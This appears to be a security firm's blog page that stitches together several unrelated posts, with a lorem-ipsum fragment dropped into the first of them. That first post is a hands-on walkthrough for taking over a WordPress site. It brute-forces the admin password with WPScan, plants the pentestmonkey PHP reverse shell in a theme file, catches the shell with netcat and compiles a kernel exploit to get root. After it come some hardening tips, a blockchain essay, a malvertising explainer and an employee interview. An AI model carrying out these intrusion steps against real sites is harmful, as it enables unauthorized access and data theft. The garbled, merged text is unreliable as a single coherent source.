WordPress is a free and open-source PAAS structure that is being used by millions across the globe as a content management system. Its features include the integration of various plugins and themes.
Also, there are many vulnerabilities associated with the plugins and themes being used within WordPress to date. According to the statistics, 73.2% of the most popular WordPress installations are vulnerable to date. These can be identified using automated tools and can be exploited. One such example is explained in this blog on how an adversary can gain root access by exploiting a vulnerability present inside the WordPress theme engine.
There anyone who loves or pursues or desires to obtain pain of itself, because it is pain, but because
occasionally circumstances occur in which toil and pain can procure him some great pleasure. To take a
trivial example, which of us ever undertakes laborious physical exercise,
Below are the steps to perform Privilege escalation for a vulnerable WordPress theme engine:
Run Nmap enumeration scan to discover the open ports and services running on the target host.
Nmap reveals HTTP service running on port 80. Also, the directories discovered in the HTTP-enum scan points to the WordPress login page.
Browse to the login page of WordPress http://*target IP*/wp-login as shown in the screenshot below:
Now, to retrieve the username and password we need to run a brute-force scan using WPScan.
WPScan is a scanner built for enumerating and brute-forcing the usernames and passwords for WordPress.
Let us first enumerate a user enumeration scan to discover the user accounts linked with WordPress using the below command:
wpscan –url *target IP* –enumerate u
The user enumeration scan reveals the usernames of the users linked with WordPress account as shown in the screenshot below:
Now that we have the username, we shall run a brute-force scan to enumerate the password for the admin account. We will a run a brute-force scan to enumerate the password for the admin account for which we use the below command:
wpscan –url *target IP* –wordlist /root/rockyou.txt –username admin
As shown in the below screenshot, as part of the brute force scan we get the username and password for the admin account. The password for the admin account is princess.
Using the username and password obtained in the WPScan we try to login into the WordPress site and navigate to the themes section in the WordPress. WordPress plugins and themes are the vulnerable points for any WordPress website.
After login navigate to Appearance>Themes>Editor
Now, we observe that there are multiple .php files in the templates and archives section. We could use any of these to upload the PHP reverse shell. For example, we will try to use archive.php file to upload the PHP reverse shell.
Replace the contents of archive.php file and replace it with our PHP reverse shell.
In this case, let us use a PHP reverse shell that is downloaded from pentest monkey.
Run the below command and download the shell:
wget http://pentestmonkey.net/tools/web-shells/php-reverse-shell/ php-reverse-shell-1.0.tar.gz
Unzip the file using $tar -xzf php-reverse-shell-1.0.tar.gz command and copy the contents of the file in archive.php file in the browser.
The IP address and port should point to the attacking system’s IP and listener port as shown in the screenshot below:
Click on the update file at the bottom of the page and we observe that the files get updated successfully with the PHP reverse shellcode.
Now, open a new terminal and start a netcat listener on port 443 which is specified in the PHP reverse shell script using the below command:
· nc -nvlp 443
Now, navigate to the modified archive.page in the browser using the below link:
· http://*target IP*/wp-content/themes/twentytwelve/archive.php
As shown in the screenshot below, after traversing to the modified archive.php file in the web browser we get a low privilege reverse shell from the attacking systems IP to the victims IP.
We got a low privilege access for webserver user “www-data”.
The next step is to elevate the privilege and get root access.
Let us run a Linux privilege checker python script to enumerate the system info and check for the world-writable files.
For that run python server using the below command to transfer file from attacker’s system to target system
python -m SimpleHTTPServer 80
Download the linux.privchecker.py file on the tmp directory of the target system using the below command
wget http://*local IP*/linuxprivchecker.py
After enumerating we also know that the world-writable directory is the tmp directory for the user www-data.
We know that the Linux version in use is Linux 2.6.32. Let us download a python script from exploitdb named as Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32) – ‘CAN BCM’ Local Privilege Escalation.
Download the script in the world-writable directory “tmp” which was discovered as part of the enumeration scan.
This script might be helpful in elevating from local privilege to root privilege.
Compile the script using the below command and save it in the output file named as rootpriv:
· gcc 14814.c -o rootpriv
Now, run the output file using ./rootpriv command.
Once the script is successfully executed using whoami check the current user.
We get access to the ROOT account as shown in the below screenshot:
Check for the files present in the root directory.
There is an interesting file wp.sql which has all the database tables and values in it which could be used to craft SQL injection attacks. Below are the contents of wp.sql file:
The blog summarizes how a user can gain root access using a vulnerable WordPress theme engine.
There are many other loopholes in WordPress that can be used to elevate privilege and retrieve sensitive information.
Below are the measures you can adopt to keep your WordPress site secure:
1. Sucuri Scanner
Install and use WordPress security plugin – Sucuri Scanner.
We need to set up an auditing and monitoring system that keeps track of everything that happens on the website. This includes file integrity monitoring, failed login attempts, malware scanning, etc.
The best part about Sucuri’s firewall is that it also comes with a malware cleanup and blacklist removal guarantee. Basically, if you were to be hacked under their watch, they guarantee that they will fix your website (no matter how many pages you have).
2. Change the Default “admin” username.
In the old days, the default WordPress admin username was “admin”. Since usernames make up half of the login credentials, this made it easier for hackers to do brute-force attacks.
Since WordPress doesn’t allow you to change usernames by default, there are three methods you can use to change the username.
3. Disable File Editing
WordPress comes with a built-in code editor which allows you to edit your theme and plugin files right from your WordPress admin area. In the wrong hands, this feature can be a security risk which is why we recommend turning it off.
4. Add Two Factor Authentication
The two-factor authentication technique requires users to log in by using a two-step authentication method. The first one is the username and password, and the second step requires you to authenticate using a separate device or app.
Most top online websites like Google, Facebook, Twitter, allow you to enable it for your accounts. You can also add the same functionality to your WordPress site.
5. Strong Passwords and User Permissions
Many systems and applications include functionality that prevents a user from setting a password that does not meet certain criteria. Functionality such as this should be leveraged to ensure only Strong passwords are being set.
6. Keep WordPress Updated
Since WordPress is open-source, anyone can study the source code to learn and improve it. You need to make sure that all your WordPress plugins, themes, and the core itself are always up to date.
7. Disable Directory Indexing and Browsing
Directory browsing can be used by hackers to find out if you have any files with known vulnerabilities, so they can take advantage of these files to gain access. Directory browsing can also be used by other people to investigate your files, copy images, find out your directory structure, and other information. Therefore, it is highly recommended that you turn off directory indexing and browsing.
Blockchain is an emerging technology that is quite popular nowadays due to the popularity of cryptocurrency. Apart from blockchain being used in cryptocurrency, it is also marketed as a cure for a lot of things including cybersecurity. Blockchain is considered to be a nearly impenetrable technology as by design, blockchain is resistant to modification of the data. The blockchain contains a list of records or blocks which are linked using cryptography. Each of those individual records/blocks contains information and data that are combined together and verified. Information such as a cryptographic hash function of the previous block, timestamp, and transaction details are permanently recorded in a distributed ledger. The ledger is decentralized in nature, all transactions are done across a peer-to-peer network. Blockchain technology is designed in such a way that there is no central authority or storage location. Every user on the network plays a part in storing some or all of the blockchain. Everyone is responsible for verifying the data that is stored and/or shared to make sure false data cannot be added and existing data cannot be removed.
Blockchain technology has been around for more than a decade. It was invented by a person using the name Satoshi Nakamoto in 2008 to serve as the public transaction ledger of the cryptocurrency bitcoin. However, as technology has gradually spread worldwide, people have begun using it in a variety of ways in numerous industries, including as a means to increase cybersecurity. Blockchain is a chain of records that leads to the formation of a distributed network that can have millions of users all over the world. Every user can add information to the blockchain and all data in the blockchain is secured through cryptography. Every other member of the network is responsible for verifying that the data being added to the blockchain is real. This is done using a system of three keys private, public, and the receiver’s key that allow members to check the veracity of the data while also confirming whom it comes from. The verified data then form a block and will be added to the chain of data. In order to make updates to a particular piece of data, the owner of that data must add a new block on top of the previous block, creating a very specific chain of code.
The network being accessed by an unauthorized person can lead to data being either stolen or damaged. Hence, it becomes essential for an individual or organization to determine the invasion. The mode of collecting and preserving evidence has a significant role to play in ensuring that the evidence is accountable in the courtroom during various situations such as lawsuits or criminal complaints.
Identifying the attack/breach and generating the required documents about the causes of cyber-attack or cyber fraud can be accountable through the use of blockchain technology. Truth-based evidence is always important in any cybercrime investigation. Digital evidence moves down the hierarchy through the chain of custody in the different levels of transactions in any investigation process. Blockchain technology can provide a clear and exhaustive view of the transactions that have taken place concerning the evidence, right from the time the evidence originated from the source [2].
There are many reported cases of missing police evidence and several of them go unaccounted for giving an easy way out for criminals, such types of things can also be prevented using blockchain technology. It can enable appropriate authorization to those who are permitted to enter the evidence room, whether electronic, magnetic, or by using private keys. The scientific approach in digital forensics flow through the search authorities, the chain of custody of evidence, imaging and hashing function, validation of data using appropriate tools, report-ability, and repetition of presentation. The entire process can be made data-centric using blockchain technology.
The hash validation with the blockchain and the timestamp will prevent repeatability and contamination of information. Keeping a clear and unique track of who accessed what and when will help to avoid the contamination of evidence and information. The blockchain technology-based application can be used to ensure proper operating practice when it comes to evidence management practices. Necessary questions like How the core data is stored, how it is communicated, who is the person responsible for handling the data, and the factors that contribute to the physical security of the data can all be streamlined efficiently. Ideas such as working with the duplicate copy and not with the original can be validated using the hash. The Hash function will take the data and will generate a fixed-sized bit sequence in the output. Thus, creating a digital fingerprint of the input data.
The number of people joining the world wide web and technology is continuously growing and developing at a very fast rate, more data gets produced and more hackers will attempt to steal or corrupt that data. The technology behind blockchain is flexible and unbelievably helpful for the future of the Internet, permitting users to better secure their data. Innovative uses for blockchain technology are already becoming a part of other fields beyond cryptocurrencies and can be especially useful to boost cybersecurity. Blockchain implementation will facilitate in forestall a lot of threats and attacks in a very system and might forestall the information from being taken or destroyed. A number of the items that blockchain will facilitate are: –
I. Preventing Fraud and Theft of data: – Blockchain technology provides one of the best securities to protect data from hackers by preventing potential fraud and decreasing the chance of data being stolen or compromised. In order to destroy or modify blockchain, a hacker would have to destroy the data stored on every user’s computer in the global network. This could be millions of computers, with each one storing a copy of some or all the data. Bigger blockchain networks with more users have an infinitely lower risk of getting attacked by hackers because of the complexity required to penetrate such a network.
II. Preventing Distributed Denial of Service (DDOS) Attacks: – Hackers can use several techniques to launch an attack, most common is sending a large number of requests/packets to the system until the system becomes unable to process these requests/packets and leading to the failure/crash of the system. DDoS attacks have been happening at an increased frequency recently, affecting bigger companies like Twitter, Spotify, SoundCloud, and more. The current difficulty in preventing DDoS attacks comes from the existing Domain Name System (DNS). The fact that it is only partially decentralized means that it is still vulnerable to hackers because they are able to target the centralized part of DNS and continue crashing one website after another. Implementing blockchain technology would fully decentralize DNS, distributing the contents to a large number of nodes and making it nearly impossible for hackers to attack. Domain editing rights would only be granted to those who need them (domain owners) and no other user could make changes, significantly reducing the risk of data being accessed or changed by unauthorized parties.
III. Decentralized Storage Solutions: –
Data is becoming more valuable than gold and oil. Every business and individuals accumulate tones of sensitive data about themselves or customers. Unfortunately, this data is also quite attractive to hackers. And one of the most convenient things you do for cybercriminals is to store all of it in one place. The business mainly is still using centralized storage when it comes to data. Blockchain-based storage solutions are slowly gaining popularity. An example of this can be Apollo data cloud which is developed by the Apollo Currency team allows users to archive data on the blockchain and grant permission for access to third parties. The cryptographic access key can be revoked at any time, further reducing the risk of a breach. Thanks to the decentralized nature of blockchain technology, hackers no longer have a single point of entry, nor can they access entire repositories of data in the event that they do get in.
Malvertisements are malicious advertisements distributed in the same way as legitimate online advertisements. It is one of the common practices to use spread malware. Cybercriminals use the advertising strategy by pretending as legitimate campaigns. Those malvertisements will either attempt to download malware directly onto visitor’s systems/devices or redirect visitors to websites meant to spread ransomware, viruses, or other malicious programs. The process of creating malvertisements and spreading malware is called malvertising. Malvertising is a favoured medium for criminal behaviour as it takes advantage of consumer trust in both companies running campaigns and advertising networks.
Ad networks are responsible for distributing real and fraudulent advertisements. The reliability of a website does not necessarily determine and has also been irrelevant to some extent to whether or not it will contain malvertisements. But saying that at the same time is the best place to be not infected with malvertisements. Recent examples have proven that even the most well-known, legitimate sites can distribute malvertisements unknowingly. In recent years, reputed sites such as Forbes, The New York Times Online, London Stock Exchange, Spotify, etc have all been negatively impacted by malvertising campaigns that infected visitors with malware.
People, in general, are confused between malvertisements and Adwares as they both deal with affecting online advertisements. Adwares are a program running on a victim or user’s system which is packaged with other legitimate softwares. Adware displays unwanted advertising, redirects search requests to advertising websites, and mines data about the user to help target or serve advertisements.
Key differences between malvertisements and adwares are:
1. Malvertisements involve deploying or injecting malicious code on a publisher’s web page. The targeted audience of malvertisements are not individual or selected users whereas Adware, however, is only used to target individual users.
2. Malvertisements are only dangerous and affect users that view the infected webpage or website whereas adwares once gets installed keeps on operating on the user’s computer.
Malvertisements are distributed via the same methods as normal online advertisements. Infected graphic files are submitted to a legitimate advertisement network with hopes that the advertiser won’t be able to differentiate between trustworthy ads and harmful ones. Advertisements generally attract and encourage viewers to click. When approved by the advertisers these malicious advertisements are added or distributed on legitimate sites. In some cases, cybercriminals will even re-register expired, but previously legitimate, domains to disguise themselves as trustworthy domains. Criminals can use redirects to send clickers to a malicious site, and users remain ignorant because they expect redirects when clicking on an ad. While on the malicious website, code will run in the background which will attempt to download malware onto the device. This unintentional download of a virus or malicious code is known as a drive-by download. Malvertisements often use drive-by attacks to download ransomware onto targeted computers. Advanced forms of malvertisements can even install malware on visitor’s devices directly from the legitimate website that is displaying the ad and without any interaction from visitors.
Attackers or people with malicious intent use several delivery mechanisms to insert their malicious codes into advertisements.
1. Malwares in Advertisements calls: When a website shows a page featuring an ad, the ad exchange delivers advertisements to the user through a variety of third parties. An attacker can compromise one of these third-party servers, who can attach malicious code to the ad payload.
2. Post-click malware injection: Users who click on an ad are typically redirected between multiple URLs, ending with the ad landing page. If any of the URLs along this delivery path are compromised by an attacker, they may execute malicious code.
3. Malware in Text or Banner Advertisements: Malware may be found in a banner ad or text message. For instance, an ad can be delivered in HTML5 as a combination of images and JavaScript which may contain malicious code.
4. Malware within a pixel of an image: The pixels are embedded with codes in an advertisement call. A legitimate pixel sends data to the server for tracking purposes. If an attacker intercepts a pixel’s delivery path, it can send a response, containing malicious code, to the user’s browser.
5. Malware within the video: Video players don’t protect against malware. Examples can be videos based on flash or specific video formats such as VAST. Video format VAST contains pixels from third parties, which could contain malicious code. Videos based on flash can inject an Iframe into the page, which downloads malware, even without having the user click on the video. Flash files might also load a pre-roll banner and attackers can inject malicious code into the pre-roll banner, and it can run even without the user clicking on the video.
Common malvertisements generally need user interaction in order for the malwares to be downloaded in a victim’s system or infect the victim/user’s system. User interaction can be victims clicking on an unsafe malicious advertisement. Following attacks or things that might happen on users viewing or interacting with malvertisements:
1. Download or installation of malwares on the computer or systems viewing those malicious advertisements.
2. Redirect the user or victim to a malicious site.
Some advanced malvertisements can affect or cause harm to a user without user interaction. Malvertising might perform the following attacks on users viewing the malvertisements without clicking it:
1. A “drive-by download” — installation of malware or adware on the computer of a user viewing the ad. This type of attack is usually made possible due to browser vulnerabilities.
2. Forced redirect of the browser to a malicious site.
3. Displaying unwanted advertising, malicious content, or pop-ups, beyond the ads legitimately displayed by the ad network. This is done by executing Javascript.
What is your name and job title in CyRAACS?
My name is Anamika, I lead the Application security VAPT projects in CyRAACS.
How would you summarize what you do? Why CyRAACS is a great place to work
At CyRAACS I am responsible for managing and leading VAPT projects wherein we must conduct VAPT assessments for IT Systems, Web applications, Mobile applications, and critical network infrastructure. We as a team conduct manual application penetration testing of thick client applications, mobile applications, web applications and web services, API’s to minimize exposure to attacks.
I am responsible to communicate with client teams often to explain and demonstrate vulnerabilities to application/system owners and assist with the mitigation of the identified vulnerabilities. I support fast-paced delivery in challenging projects. My job requires me to be highly motivated, detail-oriented, and client-focused.
CyRAACS is a great place to work because every day provides an opportunity to learn something new, to mentor, and to be mentored to achieve our client’s goals. Being part of a team that is focused and dedicated to stand up to client expectations and help employees succeed, is the best thing anyone can ask for in their career.
How long have you worked with CyRAACS?
I had the pleasure of working in CyRAACS for near to 3 years now.
What is the most interesting thing about working in CyRAACS, and about the work you do?
CyRAACS follow a no hierarchy model wherein the management keeps their doors open to promote new ideas and transparency of information within the organization.
My job demands me to be constantly updated with the latest technologies to challenge myself to know more about the trend revolving around cyber security. I like the fact that I can interact with the key stakeholders and technical team to suggest security remediations in line with their business scenario.
My journey through these years has seen many changes come through in the organization, and each time, these have been for the better, for the leadership in CyRAACS is committed to make CyRAACS a big success story in the coming years.
What are three benefits you have discovered about working in CyRAACS that you weren’t aware of when you started?
My journey at CyRAACS has been very gratifying and rewarding. I always had opportunities and challenges beyond my current role which helped me prove myself and achieve greater heights.
CyRAACS has helped me achieve my professional goal by sponsoring my certification.
I have learned over these years about my own domain, but there has also been a lot of cross-functional learning which has helped in overall growth in my career.
At CyRAACS, Individuals come in at different levels with different skill sets, expertise, aspirations, and attitudes. Here, at CyRAACS we learn to think independently, be focused, and push ourselves out of our comfort zone. This is a company that adds significant value to each employee, and it helps each individual reach her or his highest potential
I am proud and humbled to be amongst such incredibly talented people and I am thankful for the opportunity to contribute to our continued success.
What are your thoughts about the company’s vision and direction, and your role in helping CyRAACS achieve them?
Management at CyRAACS has always been transparent about what they are doing to achieve the company’s vision and has ensured that we are kept aware of the progress the company is making.
When I see my leaders working hard to live the standards of the vision, I feel equally motivated to do the same. I believe that we should be accountable for meeting our own goals and doing our part to achieve the company’s vision and direction.
I agree with the fact that transparency is great for the company's vision, but it is also a good way to build trust with employees and customers. Staying transparent about the failures and successes of the company will help your employees be more engaged and productive.
What advice would you give a job seeker who’s thinking about applying for a job with CyRAACS?
My advice to job seekers would be if you are looking for a challenging, fast-growing environment with opportunities to learn cross-functional skills, CyRAACS is a one-stop for you.
Specifically, for freshers, this is a great place to start their career because here you are mentored at every step to push yourself ad uncover your true professional.
The culture is transparent, every employee, irrespective of their position is given a chance to be heard, and there are ample opportunities available to those who want to build a career here
When you tell people about your job, what’s one thing that surprises them, or gets them excited about the work you do?
As the first job is considered as a most important point in anyone’s career path, CyRAACS proved to be the right tipping point for me. I joined as a fresh MBA graduate.
Early in my career, I was given a chance to handle a separate developing service line – Application security and I was trusted with the responsibility of handling stakeholders on my own. The whole experience has been a great learning opportunity for me.
My growth graph has been exponential as the management here has been very supportive and has given me ample learning opportunities with meaningful rewards and recognition.
Your achievements, Value provided to clients and Clients empathy etc
I have successfully completed 150+ projects with more than 50% repeat engagements.
Client achievement and empathy: I have received excellent recommendations from the majority of my clients highlighting the quality of deliverables, meeting up to the deadlines, and going beyond the set expectations from industry sector clients such as Banking industries, IT services, Healthcare, and Telecommunications.
On request from one of our clients, a tax consulting multinational company wherein the client had to make their application go live, we were given a strict deadline to complete the said task. Conducting VAPT and helping a client secure their application was one of the major responsibilities which I abided to. The client was very happy with the engagement and in turn, suggested their internal departments conduct VAPT for their other applications.
Overnight audit requirement for one of our clients operating in small finance bank sectors was a crucial task to be completed. A time constraint of 1 day was given to retest 10 applications. I took it as a challenge and had push myself to meet the said timelines and completed the task by leading my team. The client in return has extended their empanelment contract with us as their security partner.
Client-specific challenges wherein their application is inaccessible, or new functionality is introduced within the application, we have ensured that we accommodate such requests and perform multiple rounds of testing to make certain that all the functionalities of the application are tested, and the application is secure to go live on production. Clients have considered this as a key-value provided to them appreciating our extra efforts.
On request from one of our clients, an IT services company, we had to conduct VAPT for their application and Infrastructure components wherein they were given a strict government deadline to abide by. This request was taken into priority and I had to drive it to completion within the said timelines. A client gave positive feedback on the engagement and gave our referrals to other partner companies as a result.
Achievements and Certifications
Client Success Stories
Repeat clients – Our quality output and focussed approach has made CyRAACS an empanelled security partner for many of the client projects led by me across various industry sectors such as Finance, Banking, IT services, Healthcare, Telecommunications.
Referrals – Many of our clients have given referrals to their other partner companies for CyRAACS as a security vendor.
